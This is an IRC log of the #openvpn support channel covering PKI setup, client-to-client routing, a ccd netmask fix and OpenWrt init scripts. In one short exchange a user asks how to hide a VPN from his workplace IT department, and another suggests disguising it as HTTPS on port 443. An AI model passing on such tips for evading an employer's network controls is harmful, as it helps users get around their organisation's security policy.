|| Also interesting: !man !/30 !topology !iporder !sample !forum 09:58 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 09:58 < markovh> !goal 09:58 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:00 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has joined #openvpn 10:02 -!- Juzzy [Xinu@107-194-81-122.lightspeed.nsvltn.sbcglobal.net] has left #openvpn [] 10:13 < njbair> 00000.0 10:16 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:19 -!- markovh [markov@unaffiliated/markovh] has left #openvpn [] 10:21 -!- Netsplit *.net <-> *.split quits: piele_, TypoNe 10:28 -!- raidz_away is now known as raidz 10:43 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 10:44 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 10:51 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 10:52 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:54 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 272 seconds] 10:55 -!- APTX_ [APTX@unaffiliated/aptx] has joined #openvpn 10:55 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 11:06 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 11:06 -!- piele_ [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 11:06 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Max SendQ exceeded] 11:08 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 11:16 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 245 seconds] 11:18 -!- GabrieleV 
[~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 264 seconds] 11:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 11:42 -!- Netsplit *.net <-> *.split quits: jzaw, pekster, `nand` 11:42 -!- Netsplit over, joins: pekster 11:43 -!- Netsplit over, joins: jzaw 11:49 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 11:53 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 12:00 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Remote host closed the connection] 12:01 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:01 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 12:03 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has joined #openvpn 12:04 < robert_> Hi, RudyValencia and I are trying to get a VPN going where clients can't access other clients' VPN addresses, but servers can access everybody's VPN addresses. 12:04 -!- mndo [~mndo@bl16-93-232.dsl.telepac.pt] has joined #openvpn 12:04 < RudyValencia> and clients should be able to access servers, of course 12:04 < Poster> you need the client-to-client defined in your server configuration 12:05 < pekster> No, you explicitly need *not* to have that defined if you want to do per-client access control like that 12:05 < pekster> !c2c 12:05 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. 
you use this option when you do not want to use selective firewall rules on what clients can access things 12:05 <@vpnHelper> behind other clients 12:05 < RudyValencia> so we're stumbling on the whole "The server will only accept clients whose certificates were signed by the master CA certificate" thing 12:06 < Poster> oh, sorry I misread 12:06 < RudyValencia> does that mean client certificates must come from the same CA that issues server certificates? 12:06 < pekster> Yes 12:06 < pekster> That's how PKI works 12:07 < robert_> we were thinking about using separate intermediate CAs for clients and servers 12:07 < RudyValencia> Does that requirement extend to the same subordinate CA (e.g., can we have an identities CA and a network CA rooted to the same root CA?) 12:07 < pekster> Sure, you can use a subCA. IIRC you need the chain provided to the remote end so it can fully verify the trust chain 12:08 < pekster> Unless it's a benefit for your admin process, it's generally more trouble than it's worth to run a chained CA setup like that for OpenVPN. However, perhaps you have benefits in your workflow for such a case 12:09 < Poster> only benefit I could see would be allowing a helpdesk/desktop type group to issue client certs without knowing the CA passphrase for server 12:10 < Poster> but inheritly clients would trust client certs and server certs 12:10 <@EugeneKay> It simplifies configuration a bit because you don't need to ensure that a server is signed as a client/server if you know beforehand that the CA signing it is only used for clients/servers. 
12:10 < RudyValencia> we may be automating that process when we write our HR systems 12:10 <@EugeneKay> Eg, you don't need to do any checks on the certUsage 12:11 < Poster> I've not had to specify whether a cert is a client or server cert 12:11 < Poster> I use them in both directions 12:11 < pekster> !mitm 12:11 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 12:11 < RudyValencia> We have a CA already 12:12 < pekster> Right. That info is mostly generic (besides the easy-rsa centric stuff.) If you don't use a separate CA chain for client/server certs and you don't have clients verify ku/eku of certs, authorized clients can possibly post as serveres as a MITM attacker to another client 12:12 < pekster> pose* 12:13 <@EugeneKay> Yup. But if you have access to takeover the server's IP address you prooooobably have the server.key anyway 12:13 <@EugeneKay> Different sort of check, but in real-world security.... 
12:13 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:14 < pekster> ARP spoofing, DNS poisioning, asserting yourself as your target's default gateway, plenty of ways to become an attacker on the wire in the flow of data if you have the access 12:14 < RudyValencia> We can use two different config files with openssl to generate certs with different KU/EKU parameters 12:14 < RudyValencia> e.g., openssl-server.conf for server certs, openssl-client.conf for client certs 12:15 <@EugeneKay> I also set the ns-cert-type 12:15 < RudyValencia> yes 12:15 < pekster> Sure, but you don't even need that; easy-rsa 2.x has support for this out of the box (see the .cnf file it provides) and the prototype 3.x "next-gen" code I'm working on does it dynamically with an -extfile option 12:15 < Poster> I thought tls-remote was used to validate the remote side is who they say they are 12:15 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 12:15 < Poster> requiring a cert to match the name and being signed by the same CA 12:15 < pekster> No need for multiple config files if you set up your openssl.cnf to support mutliple extension stanzas 12:16 <@EugeneKay> XCA 4 Lyfe 12:16 < pekster> EugeneKay: nsCertType is more or less deprecated. TLS ku/eku is where it's at now. I'd love to see the "Netscape" extensions die a death much quicker than they will 12:16 <@EugeneKay> Meh 12:17 < pekster> Poster: That's one way, but it precludes the use of multiple server certs with unique DNs 12:18 < pekster> Or at least the CN field 12:19 < pekster> Hmm, I guess the manpage says you can use a "prefix" too. 
Sort of a weird feature 12:19 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 12:21 -!- APTX_ [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds] 12:22 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 12:24 -!- APTX [APTX@unaffiliated/aptx] has quit [Read error: Connection reset by peer] 12:28 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 12:29 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:32 -!- epochwolf [~root@unaffiliated/epochwolf] has joined #openvpn 12:32 < epochwolf> EugeneKay: yo 12:32 < epochwolf> I'm trying to set up openvpn so I can access my home network from my work. I can have all the computer connect and ping the server but they can't see eachother and when I turn on client-to-client on the server, the clients can't ping anyone, including the server. 12:32 < epochwolf> https://gist.github.com/epochwolf/e77b5e77ad4eee8bfd9e 12:32 <@vpnHelper> Title: client.conf (at gist.github.com) 12:32 <@EugeneKay> !serverlan 12:32 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 12:33 < epochwolf> EugeneKay: so I need push route, not route 12:33 <@EugeneKay> Yes. The server routing lan traffic via openvpn would be daft ;-) 12:34 < epochwolf> EugeneKay: the description for client-to-client implies that :P 12:34 <@EugeneKay> client-to-client is for vpn clients 12:34 < epochwolf> that's what I want. 12:34 < epochwolf> I want clients on the vpn to be able to talk to other clients on the vpn. 12:35 <@EugeneKay> Uh 12:35 <@EugeneKay> Is your home LAN behind a VPN client? 12:35 < epochwolf> EugeneKay: no… two computers on my home lan, one is at work. 
I want them all to talk to eachother. 12:35 <@EugeneKay> So which machine is your VPN server 12:35 < epochwolf> linode vps 12:36 <@EugeneKay> So, then the answer is "yes", the LAN is behind a vpn client 12:36 < epochwolf> all clients can ssh into it through the vpn right now. 12:36 <@EugeneKay> You want Client A to be able to speak to a LAN behind client B 12:36 < epochwolf> not the lan, just the client 12:36 < epochwolf> I want 10.133.7.4 to ping 10.133.7.5 12:36 <@EugeneKay> Well then no routing beyond the basics needed for openvpn should nbe needed 12:37 <@EugeneKay> Just allow the relevant stuff in the firewalls 12:37 < epochwolf> iptables is clear and ip_forward is on 12:37 <@EugeneKay> clear != open ;-) 12:37 < epochwolf> hmm… I'll add my iptables conf 12:37 < pekster> And remember if you test is a ping, that all *3* involved systems need to accept it 12:37 <@EugeneKay> Look at the nat table 12:37 < epochwolf> nat table? 12:38 <@EugeneKay> iptables -t nat 12:38 <@EugeneKay> You're not doing any, but it might have some silly rule in it 12:38 < pekster> 'iptables-save' is the surest way to view your complete netfilter ruleset, including all tables you have loaded 12:38 < epochwolf> a dozen entries of MASQUERADE all -- 10.133.7.0/24 anywhere 12:38 <@EugeneKay> !paste 12:38 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 12:39 < epochwolf> pekster: I've got a save 12:39 <@EugeneKay> If both clients can ping the server's VPN address then you're most of the way there 12:39 <@EugeneKay> Also see if the server can pign the client's VPN addy 12:39 <@EugeneKay> It /could/ be the client firewalls too 12:40 < epochwolf> https://gist.github.com/epochwolf/e77b5e77ad4eee8bfd9e#file-iptables-conf 12:40 <@vpnHelper> Title: client.conf (at gist.github.com) 12:40 < epochwolf> EugeneKay: they are off right now. 
:) I can ping locally 12:40 <@EugeneKay> Again; clear != open, and locally != remotely 12:40 < epochwolf> EugeneKay: both systems are OS X and have their firewall off in the preferences. 12:41 <@EugeneKay> But can the server ping them? 12:41 < epochwolf> let me check 12:41 < epochwolf> yes 12:41 <@EugeneKay> Goodie 12:42 < robert_> so just to be clear, can we have two separate CA's for client and services access? 12:42 < vect0rx> bbl 12:42 -!- vect0rx [vectorx@havok.org] has left #openvpn [] 12:42 < epochwolf> I just loaded the firewall rules, I can ping between client and the server but not between clients 12:42 <@EugeneKay> robert_ - yes; the certificate in --cert does NOT need to be signed by the one listed in --ca. 12:42 < pekster> robert_: Yes. You can even make them completely separate root CAs if you'd like instead of subCAs under a common root since validation is handled remotely by the peer validating the presented cert 12:43 <@EugeneKay> epochwolf - what happens with client-to-client on? 12:43 < epochwolf> EugeneKay: no one can ping 12:43 <@EugeneKay> Fun 12:43 <@EugeneKay> Oh, add in 'topology subnet' 12:43 < epochwolf> EugeneKay: adding that push route also killed pings 12:44 <@EugeneKay> It'll make things a LOT simpler 12:44 <@EugeneKay> I hate that it isn't the default 12:45 < pekster> Oh, that reminds me to look at why --route-gateway isn't the default when using --server with --topology subnet 12:45 < epochwolf> EugeneKay: to server or client? 12:45 <@EugeneKay> Server 12:45 < epochwolf> EugeneKay: okay, I've reverted the configs back to the gist version. I will add "topology subnet". 12:46 <@EugeneKay> Client gets it automagically as part of --client / --pull 12:46 < epochwolf> do I need client-to-client or a route? 12:46 <@EugeneKay> No route should be needed 12:46 <@EugeneKay> The --server line handles all of the route statements 12:46 < epochwolf> do I need client-to-client? 
12:47 <@EugeneKay> You shouldn't with that iptables config, but feel free to toss it in 12:47 < epochwolf> EugeneKay: that didn't work. :( 12:48 <@EugeneKay> Logs? 12:48 < robert_> pekster/EugeneKay and this is on the same openvpn setup? 12:48 < epochwolf> EugeneKay: what logs? 12:48 <@EugeneKay> !logs 12:48 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 12:48 <@EugeneKay> Those logs ^ 12:49 < pekster> robert_: If by "same setup" you mean 2 peers establishing an openvpn tunnel, yes. 12:49 <@EugeneKay> robert_ - each peer only verifies the other party's --cert against the local --ca. They do NOT verify their own --cert against the same --ca. 12:49 < epochwolf> EugeneKay: https://gist.github.com/epochwolf/97cc25d8df6b4526ce0d 12:49 <@vpnHelper> Title: client.log (at gist.github.com) 12:49 <@EugeneKay> 2013-03-19 10:48:15 ERROR: OS X route add command failed: external program exited with error status: 68 12:49 <@EugeneKay> That's telling 12:49 < robert_> pekster: "same setup" meaning same instance of openvpn 12:50 <@EugeneKay> Something isn't write in your server.conf 12:50 <@EugeneKay> Paste a freshie? 12:50 < pekster> netmask isn't a netmask; it's an IP 12:50 < epochwolf> EugeneKay: give me a few minutes. I've got to shuffle the file around again. I can't directly download from here. 12:52 < pekster> robert_: Same "instance"? huh? PKI/X509 is used to validate opposing ends (each unique instances themselves.) 
Each side has only a single --ca certificate (used to validate a remote peer's presented cert) and a --cert certificate (presented to the other peer for said validation on the remote end) 12:52 < robert_> nevermind 12:53 < epochwolf> EugeneKay: https://gist.github.com/epochwolf/015b19e2da5a71119293 12:53 <@vpnHelper> Title: clients_teapot (at gist.github.com) 12:54 <@EugeneKay> Yah, there's your problem 12:54 <@EugeneKay> Set a netmask 12:54 <@EugeneKay> In your ccd file 12:55 -!- xbanux [~xbanux@triband-mum-59.182.142.68.mtnl.net.in] has quit [Read error: Connection reset by peer] 12:55 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has joined #openvpn 12:57 < epochwolf> netmask? 12:57 <@EugeneKay> Set the last arg to 255.255.255.0 12:57 < epochwolf> oh, I'm a fucking idiot :D 12:58 <@EugeneKay> I'm not debating that 13:02 <@EugeneKay> Works now? 13:03 < epochwolf> EugeneKay: I disabled ccds and client-to-client works. 13:04 < epochwolf> Now I need to turn them back on and figure out why it's not working 13:04 <@EugeneKay> Because you derped the ccd :-p 13:04 < epochwolf> no shit :D 13:04 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has quit [Read error: Operation timed out] 13:04 < epochwolf> This breaks it "ifconfig-push 10.133.7.6 10.133.7.0 255.255.255.0 " 13:05 <@EugeneKay> Remove the middle arg 13:05 < epochwolf> oh 13:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:08 < epochwolf> EugeneKay: thank you so much, it's working 13:08 -!- novaflash is now known as novaflash_away 13:09 -!- novaflash_away is now known as novaflash 13:09 <@EugeneKay> Enjoy 13:09 < epochwolf> I will 13:09 < epochwolf> next question, how do I hide a vpn connection so my it department doesn't know that I'm using a vpn to access my work machine? :P 13:09 <@EugeneKay> !statickey 13:09 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. 
They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info 13:10 <@EugeneKay> tl;dr you can't. 13:10 < epochwolf> EugeneKay: lol, nice response 13:10 <@EugeneKay> They'll know you're running /something/, just not necessarily what. 13:10 <@EugeneKay> A proper static-key setup looks like essentially random data, but it's still data 13:10 < epochwolf> haha, I know. I was kidding. If I wanted to do that I would have a cronjob that checks a remote url for a specific phrase and only start the vpn if that phrase exists. 13:10 <@EugeneKay> If you want to hide your traffic buy a cell hotspot 13:11 < epochwolf> Actually, that's not a bad idea. I could easily hide an ipad in the case. 13:12 < epochwolf> Not going to do that. :) 13:12 < epochwolf> I've thought about how to do it but getting arrested for hacking isn't high on my list of life goals. 13:13 < kisom> How's that hacking? 
13:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 276 seconds] 13:16 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has quit [Ping timeout: 255 seconds] 13:16 -!- ade_b [~Ade@AMarseille-156-1-204-244.w92-150.abo.wanadoo.fr] has joined #openvpn 13:16 -!- ade_b [~Ade@AMarseille-156-1-204-244.w92-150.abo.wanadoo.fr] has quit [Changing host] 13:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 13:28 -!- mndo [~mndo@bl16-93-232.dsl.telepac.pt] has quit [Remote host closed the connection] 13:42 -!- master_of_master [~master_of@p4FF24360.dip.t-dialin.net] has joined #openvpn 13:44 -!- master_o1_master [~master_of@p4FF24F5D.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 13:52 < Poster> your best bet is probably to run the openvpn daemon on 443/tcp 13:52 < Poster> of everything possibly legit, https traffic is your best bet 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:54 < rob0> Personally, I would not work very hard to subvert the will of corporate IT. If they don't want me doing something, I wouldn't do it, even if in my opinion it was for the benefit of the company. 
14:05 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has joined #openvpn 14:10 -!- dvl [~dan@nyi.unixathome.org] has joined #openvpn 14:10 -!- dvl [~dan@nyi.unixathome.org] has quit [Changing host] 14:10 -!- dvl [~dan@pdpc/supporter/active/dvl] has joined #openvpn 14:19 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 14:23 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 14:30 -!- dazo is now known as dazo_afk 14:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 14:31 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 14:50 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:51 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 276 seconds] 15:00 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 15:03 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 15:06 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 245 seconds] 15:06 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 15:31 -!- GH0 [~asdfgjkl@cpe-173-095-129-006.nc.res.rr.com] has joined #openvpn 15:37 < jzaw> can one put an up /etc/openvpn/somescript.sh in client.conf? 15:38 < jzaw> doesnt seem to be exectuting in 2.3 on openwrt 15:39 < jzaw> script-security 2 15:39 < jzaw> up "/etc/openvpn/client-up.sh" 15:39 < pekster> You checked warnings about --script-security in your logs? And sometimes init systems will add their own --up and --down scripts, so perhasp try it from the command-line to verify it's working as expected 15:39 < jzaw> and client-up.sh is 744 15:40 < jzaw> it works if i execute manually from cli 15:40 < pekster> openvpn? 
15:40 < jzaw> openvpn on openwrt 15:40 < pekster> as in, "openvpn --config /etc/openvpn/my.conf" ? 15:40 < jzaw> ah no ... i ran it after i ran openvpn 15:41 < pekster> I suggesting you run openvpn directly from a console to rule out the distro's init inserting its own upscript in place of yours. I don't recall offhand how openwrt does the openvpn init becuase I wrote my own 15:43 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 15:44 < jzaw> trying now pekster 15:44 < jzaw> that works ... running manually as you said 15:44 < jzaw> interesting that i dont seem to get any ipv6 traffic ... say mtr 15:45 < jzaw> till ive done a mtr in ipv4 first 15:45 < jzaw> pekster, would it be appropriate for you to share your init script? 15:46 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 15:47 < pekster> For openwrt? I need to get a cleaner copy as what I have now is really rough (a longer-term version is on my todo list, but first is getting hacked together what I want it to do before I worry about beautifying it and connecting it to UCI.) Hang on a minute and I'll see if what I have in source control is of any use 15:52 < pekster> jzaw: I'm not sure how useful it is, but here you go: http://pekster.sdf.org/code/files/openvpn.init.devel 15:53 < pekster> I haven't touched it in a while (been more interested in other projects recently) but IIRC it should work to start/stop. Obviously the status doesn't do much. To use it, drop it in /etc/init.d/whatever (openvpn, or openvpn-perinstance or something) and symlink openvpn.configname to it. 
It'll then start /etc/openvpn/configname.conf 15:55 -!- xbanux [~xbanux@triband-mum-59.182.131.184.mtnl.net.in] has quit [Ping timeout: 264 seconds] 15:57 < jzaw> thank pekster 15:58 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 16:08 < jzaw> pekster, where in your init script you have EXTRA_COMMANDS="status" 16:08 < jzaw> the openwrt init script has 16:08 < jzaw> EXTRA_COMMANDS="up down" 16:09 < jzaw> is this what is getting in the way ? 16:09 < pekster> The stock No clue. My custom firmware rips out the stock initscript, so I don't really care to troubleshoot upstream's stupid design choices 16:09 < pekster> If it adds the --up option to some script, probably 16:10 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 16:10 < pekster> It should be somewhat trivial to add an echo line in the initscript above the line that launches openvpn (usually with $SSD that is defined to start-stop-daemon, but again, without a copy in front of me I'm just guessing 16:11 < pekster> They source all the configuration from UCI, so it's almost as bad as NetworkManager in terms of transparancy. That's one of the many reasons I replaced it with a no-frills initscript that I could manage myself 16:11 < pekster> The only reason to run upstream's init is if you want it to integrate nicely into LuCI or WebIF 16:12 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 252 seconds] 16:14 < jzaw> http://sprunge.us/PjaL 16:16 -!- rocco1 [~rocco@2001:4dd0:fd53:101:213:77ff:fef1:af0e] has joined #openvpn 16:16 -!- rocco1 [~rocco@2001:4dd0:fd53:101:213:77ff:fef1:af0e] has left #openvpn [] 16:16 < jzaw> pekster, i pretty much hate uci 16:16 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 16:17 < pekster> UCI has its purpose. 
Check out my iptables init project on my openwrt page for a sample of how to "properly," IMO, use it 16:17 < pekster> I make no attempt to integrate my code into the web frontends since I don't even have such a frontend in my firmware. I use it strictly as a console interface and tune it to suit me 16:18 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving] 16:19 < pekster> At quick glance (all I'm willing to look at their config) 'start' starts the 'openvpn' labeled instance, while 'up' starts all instances of type 'openvpn'. Doesn't look like anything mucks with --up unless present in the UCI config 16:20 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 16:20 < pekster> Everything else is merely pulled from the UCI config with underscores converted to dashes, followed by any optional parameters 16:21 * jzaw nods 16:21 < jzaw> thanks for looking 16:28 -!- kls [~kls@198.211.125.123] has joined #openvpn 16:28 -!- kls [~kls@198.211.125.123] has left #openvpn [] 16:30 -!- JSharpe_ [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has joined #openvpn 16:31 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has quit [Ping timeout: 264 seconds] 16:52 < jzaw> pekster, just for clarity ... i ln -s openvpn openvpn.client .... it finds and runs /etc/openvpn/client.conf 16:53 < pekster> Assuming you issued that command in /etc/init.d/, yes 16:53 < jzaw> but for it to run at boot time ill have to symlink openvpn.client to something like rc.d/S20openvpn.client 16:53 < pekster> Right 16:54 < jzaw> cool cool ... just making sure 16:54 < jzaw> :) 16:54 < pekster> S95 is more appropriate 16:54 < jzaw> ah so to make sure all interfaces are up and stable etc 16:55 < jzaw> youre right ... its S95 curently now 16:55 < jzaw> currently 16:55 < pekster> Hence why I listed it in my config 16:56 < pekster> A clean way to add/remove configs was on a back-burner item in that project log. 
The plan was to migrate to UCI to define the configs (but not the actual config itself) so the start/stop/instance stuff was just a filler until then 16:56 < pekster> (hence why it's not exactly polished.) If you use early development code, you keep all the bits when it doesn't do what you want ;) 16:57 < jzaw> :) 16:58 < jzaw> say you mention not having a gui on your openwrt 16:58 < pekster> Better question for #openwrt 16:58 < jzaw> i used it years ago originally on the wrt54gl ... 16:58 < jzaw> ah sure ... was just going to ask ... is it poss to have it like a bare linux box none of this uci stuff? 16:58 < jzaw> ie more trad 16:59 < pekster> UCI is a core part of how they do things. It replaces the "nvram" setup by allowing you to use traditional Unix config files backed by jffs2 storage. This is a vast improvement from the 8.x days 17:00 < jzaw> one last one ... is there any convention prohibiting a dot in the S95openvpn.conf symlink? 17:00 < pekster> UCI isn't even bad; in fact, it's great. It's only a poor tool when f.eg your entire openvpn config ends up in UCI instead of in a config file where it belongs. That's when the abstraction has gone too far 17:01 < jzaw> funnily enough i just wrote a normal conf ... didnt use their option blah nomenclature 17:01 < pekster> Have as many dots as you want, but the instance name used to form the config strips everything up to and including the final dot 17:01 < pekster> So /etc/rc.d/S95.open.v.p.n.thing1 would still launch thing1.conf 17:01 < jzaw> cool 17:02 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 17:02 < jzaw> i presume one would have to have an init script for each vpn ? 17:02 < jzaw> theirs seems to find any file with .conf on it 17:02 < jzaw> i think 17:03 < pekster> Right. 
That was a temporary design intended to go away that has been left with the stagnation on that project 17:03 * jzaw nods i understand 17:03 < jzaw> well thats using my up.sh nicely now 17:03 < jzaw> thanks 17:05 < jzaw> has to be said for a £10, 5 Watt device a tp-link wr740n does rather bloody well 17:05 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 17:06 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 17:24 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 17:24 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:26 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 17:43 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:55 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Read error: Connection reset by peer] 18:02 -!- master_o1_master [~master_of@p4FF24CB8.dip.t-dialin.net] has joined #openvpn 18:06 -!- master_of_master [~master_of@p4FF24360.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 18:11 -!- novaflash is now known as novaflash_away 18:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:29 -!- M1L0 [~M1L0@200.106.37.56] has joined #openvpn 18:29 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 18:34 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 18:34 < M1L0> hi, does anyone here speak Spanish? 18:35 < rob0> openvpn is spoken here. Google Translate helps with the rest. 18:36 < M1L0> XD 18:36 < M1L0> Thanks, the thing is I have a problem: I can't see my Openvpn clients from the server.. 
18:47 < M1L0> I have a problem, I can not see my remote clients from the server Openvpn 18:53 -!- CygniX [~CygniX@unaffiliated/twois10] has joined #openvpn 18:53 < rob0> Often that's because of client firewalls. "See" means what? ping? 18:54 < M1L0> no ping 18:54 < rob0> check firewalls 18:55 < M1L0> from server to client, or from client to client 18:55 < rob0> possible either or both, yes 18:57 < M1L0> you know any manual? 19:03 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:03 -!- JSharpe__ [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has joined #openvpn 19:04 -!- robert___ [~hellspawn@objectx/robert] has joined #openvpn 19:05 -!- robert_ [~hellspawn@objectx/robert] has quit [Read error: Connection reset by peer] 19:05 -!- matsh [divine@nanogene.org] has quit [Read error: Connection reset by peer] 19:05 -!- matsh [divine@nanogene.org] has joined #openvpn 19:05 -!- JSharpe_ [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has quit [Read error: Connection reset by peer] 19:17 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 19:26 -!- brute11k [~brute@89.249.235.131] has quit [Quit: Leaving.] 19:27 < pekster> M1L0: The official "howto" guide is at the following URL: 19:27 < pekster> !howto 19:27 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 19:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 19:28 < rob0> um, if you mean a manual for your OS's firewall, that varies by OS. 